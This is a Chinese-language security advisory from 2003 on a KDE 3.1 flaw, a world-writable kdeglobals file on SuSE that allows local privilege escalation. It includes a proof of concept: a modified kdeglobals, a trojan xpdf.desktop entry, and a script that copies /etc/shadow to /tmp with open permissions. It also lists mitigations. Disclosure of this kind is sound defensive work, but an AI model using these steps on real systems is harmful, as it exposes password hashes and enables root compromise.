KDE 3.1全局配置文件不安全默认访问权限漏洞
发布日期:2003-11-14
更新日期:2003-11-21
受影响系统:KDE KDE 3.1
- RedHat Linux 9.0
- SuSE Linux 8.1
描述:
BUGTRAQ ID:
9047
KDE是一款免费开放源代码X桌面管理程序,设计用于Unix和Linux操作系统。
部分系统下的KDE 3.1包含的"kdeglobals"配置文件默认全局可写,本地攻击者可以利用这个漏洞使用恶意文件替代配置文件,提升权限。
SUSE 8.2的KDE 3.1中,默认的巴西版本安装后,其/etc/opt/kde3/share/config目录下的"kdeglobals"文件默认全局可写,攻击者可以使用恶意文件覆盖此配置文件,可导致以root用户权限执行时造成权限提升。
<*来源:Martin Fallon (
mar_fallon@yahoo.com.br)
链接:
http://www.securityfocus.com/archive/82/344482/2003-11-11/2003-11-17/0
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Martin Fallon (
mar_fallon@yahoo.com.br)提供了如下测试方法:
建立如下文件替代kdeglobals文件:
#
# written by SuSEconfig.kde
#
[Locale]
Country=pt
Language=pt:BR
#Abaixo jah alterados.
[Paths]
Desktop=/tmp/Desktop
建立文件佳/tmp/Desktop,并建立木马文件,如:
glaudson@suse:/tmp/Desktop> cat xpdf.desktop
[Desktop Entry]
Exec=/tmp/AutoStart/teste.sh
Icon=gv
TerminalOptions=
Path=
Type=Application
Terminal=0
X-KDE-StartupNotify=false
glaudson@suse:/tmp/Desktop>
建立文件执行/tmp/Autostart/teste.sh执行木马程序:
glaudson@suse:/tmp/Desktop> cat ../AutoStart/teste.sh
#!/bin/bash
cp /etc/shadow /tmp/shadow
chmod 0777 /tmp/shadow
"xpdf"图标会出现在ROOT桌面上,如果ROOT运行此图标就会导致木马执行。
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* chmod 0500 /etc/opt/kde3/share/config/kdeglobals
或
rm -rf /etc/opt/kde3/share/config/kdeglobals
厂商补丁:
KDE
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.kde.org/浏览次数:2779
严重程度:0(网友投票)